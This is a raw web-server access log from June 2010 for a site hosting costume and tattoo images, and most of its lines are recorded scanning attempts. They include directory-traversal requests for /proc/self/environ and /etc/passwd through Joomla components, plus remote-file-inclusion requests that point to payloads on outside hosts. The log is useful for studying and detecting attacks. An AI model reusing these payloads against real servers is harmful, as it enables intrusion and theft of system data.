91.121.201.191 - - [02/Jun/2010:06:06:50 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:06:06:51 -0500] "GET /logs/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:06:06:54 -0500] "GET /logs/access_log.1274832000/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:06:06:54 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:06:06:54 -0500] "GET /logs/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
121.88.4.141 - - [02/Jun/2010:06:11:36 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
121.88.4.141 - - [02/Jun/2010:06:11:37 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
121.88.4.141 - - [02/Jun/2010:06:11:38 -0500] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.79"
87.250.255.243 - - [02/Jun/2010:06:14:50 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
91.191.35.13 - - [02/Jun/2010:06:15:31 -0500] "GET /logs/toolbar_ext.php?mosConfig_absolute_path=http://goran.ath.cx/run.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.834"
91.191.35.13 - - [02/Jun/2010:06:15:31 -0500] "GET /toolbar_ext.php?mosConfig_absolute_path=http://goran.ath.cx/run.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.53.72.50 - - [02/Jun/2010:06:20:39 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.53.72.50 - - [02/Jun/2010:06:20:39 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
74.53.72.50 - - [02/Jun/2010:06:20:39 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
209.44.120.2 - - [02/Jun/2010:06:23:36 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:06:23:36 -0500] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
209.128.28.203 - - [02/Jun/2010:06:23:36 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:36 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:36 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:36 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:36 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:36 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
209.128.28.203 - - [02/Jun/2010:06:23:37 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://12ozprophet.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
74.53.72.50 - - [02/Jun/2010:06:23:49 -0500] "GET /logs/access_log.1274572800/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.53.72.50 - - [02/Jun/2010:06:23:49 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.53.72.50 - - [02/Jun/2010:06:23:49 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
74.53.72.50 - - [02/Jun/2010:06:24:20 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
80.233.172.42 - - [02/Jun/2010:06:25:02 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [02/Jun/2010:06:25:03 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
89.145.108.230 - - [02/Jun/2010:06:25:41 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [02/Jun/2010:06:25:41 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
222.122.52.80 - - [02/Jun/2010:06:26:18 -0500] "GET //admin.php?PHPFFL_FILE_ROOT=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:06:26:19 -0500] "GET /logs//admin.php?PHPFFL_FILE_ROOT=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.53.72.50 - - [02/Jun/2010:06:30:11 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.53.72.50 - - [02/Jun/2010:06:30:11 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.53.72.50 - - [02/Jun/2010:06:30:11 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
66.249.65.59 - - [02/Jun/2010:06:30:34 -0500] "GET /costume/history5.gif HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
207.46.195.241 - - [02/Jun/2010:06:31:56 -0500] "GET /logs/access_log.1238630400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.55.146.200 - - [02/Jun/2010:06:33:52 -0500] "GET /logs/access_log.1223683200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blank-invitations.whilt.com/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
72.55.146.200 - - [02/Jun/2010:06:33:52 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blank-invitations.whilt.com/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
72.55.146.200 - - [02/Jun/2010:06:33:52 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blank-invitations.whilt.com/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
209.126.254.141 - - [02/Jun/2010:06:34:05 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.126.254.141 - - [02/Jun/2010:06:34:05 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.126.254.141 - - [02/Jun/2010:06:34:05 -0500] "GET /logs/access_log.1271635200//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.126.254.141 - - [02/Jun/2010:06:34:06 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.126.254.141 - - [02/Jun/2010:06:34:06 -0500] "GET /logs/access_log.1271635200//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.126.254.141 - - [02/Jun/2010:06:34:06 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
209.126.254.141 - - [02/Jun/2010:06:34:06 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-"""
209.126.254.141 - - [02/Jun/2010:06:34:06 -0500] "GET /logs/access_log.1271635200//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-"""
209.126.254.141 - - [02/Jun/2010:06:34:06 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-"""
209.126.254.141 - - [02/Jun/2010:06:34:06 -0500] "GET /logs/access_log.1271635200//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-"""
209.126.254.141 - - [02/Jun/2010:06:34:06 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-"""
209.126.254.141 - - [02/Jun/2010:06:34:07 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
38.101.148.126 - - [02/Jun/2010:06:34:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [02/Jun/2010:06:34:39 -0500] "GET /logs/access_log.1250035200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
209.126.254.141 - - [02/Jun/2010:06:34:56 -0500] "GET /logs/access_log.1274832000//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.126.254.141 - - [02/Jun/2010:06:34:57 -0500] "GET /logs/access_log.1274832000//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.126.254.141 - - [02/Jun/2010:06:34:57 -0500] "GET /logs/access_log.1274832000//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-"""
209.126.254.141 - - [02/Jun/2010:06:34:57 -0500] "GET /logs/access_log.1274832000//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-"""
64.56.46.102 - - [02/Jun/2010:06:35:31 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
64.56.46.102 - - [02/Jun/2010:06:35:31 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
209.126.254.141 - - [02/Jun/2010:06:35:41 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.126.254.141 - - [02/Jun/2010:06:35:41 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.126.254.141 - - [02/Jun/2010:06:35:42 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-"""
209.126.254.141 - - [02/Jun/2010:06:35:42 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-"""
64.56.46.102 - - [02/Jun/2010:06:36:04 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
209.44.120.2 - - [02/Jun/2010:06:36:19 -0500] "GET /logs/access_log.1274832000//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:06:36:19 -0500] "GET //*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:06:36:20 -0500] "GET /logs//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
195.190.166.35 - - [02/Jun/2010:06:36:33 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.defsa.org.za/e107_plugins/autogallery/Log/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
195.190.166.35 - - [02/Jun/2010:06:36:33 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.defsa.org.za/e107_plugins/autogallery/Log/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
208.99.198.179 - - [02/Jun/2010:06:38:22 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
208.99.198.179 - - [02/Jun/2010:06:38:22 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
209.44.120.2 - - [02/Jun/2010:06:39:45 -0500] "GET /logs/access_log.1273363200//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.805"
211.132.187.170 - - [02/Jun/2010:06:44:44 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
211.132.187.170 - - [02/Jun/2010:06:44:47 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
211.132.187.170 - - [02/Jun/2010:06:45:46 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
211.132.187.170 - - [02/Jun/2010:06:45:49 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
222.122.52.80 - - [02/Jun/2010:06:46:14 -0500] "GET //write.php?dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:06:46:14 -0500] "GET /logs//write.php?dir=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
207.46.199.180 - - [02/Jun/2010:06:46:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.23.236.82 - - [02/Jun/2010:06:48:30 -0500] "GET /index.php?sel=http://mjkl.interfree.it/id.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.23.236.82 - - [02/Jun/2010:06:48:32 -0500] "GET /logs/index.php?sel=http://mjkl.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
72.51.42.60 - - [02/Jun/2010:06:48:50 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.51.42.60 - - [02/Jun/2010:06:48:50 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.51.42.60 - - [02/Jun/2010:06:48:51 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
72.51.42.60 - - [02/Jun/2010:06:48:51 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
89.238.145.196 - - [02/Jun/2010:06:54:12 -0500] "GET //uigaproxy/include/template.php?content=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 315 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:06:54:12 -0500] "GET /logs/access_log.1272326400//uigaproxy/include/template.php?content=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 342 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:06:54:12 -0500] "GET /logs//uigaproxy/include/template.php?content=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:06:54:15 -0500] "GET /logs/access_log.1272240000//uigaproxy/include/template.php?content=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 342 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:06:54:24 -0500] "GET /logs//uigaproxy/include/template.php?content=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:06:54:24 -0500] "GET //uigaproxy/include/template.php?content=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 315 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:06:54:25 -0500] "GET /logs/access_log.1272326400//uigaproxy/include/template.php?content=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 342 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:06:54:28 -0500] "GET /logs/access_log.1272240000//uigaproxy/include/template.php?content=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 342 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:55:17 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:55:17 -0500] "GET /logs/access_log.1273017600//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:55:17 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:55:18 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:55:18 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:55:18 -0500] "GET /logs/access_log.1273017600//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:55:18 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:55:18 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:55:18 -0500] "GET /logs/access_log.1273017600//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:55:18 -0500] "GET //appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 301 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:55:19 -0500] "GET /logs/access_log.1273017600%20%20//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.44.82.61 - - [02/Jun/2010:06:55:19 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:06:55:24 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 306 "-""Mozilla/5.0"
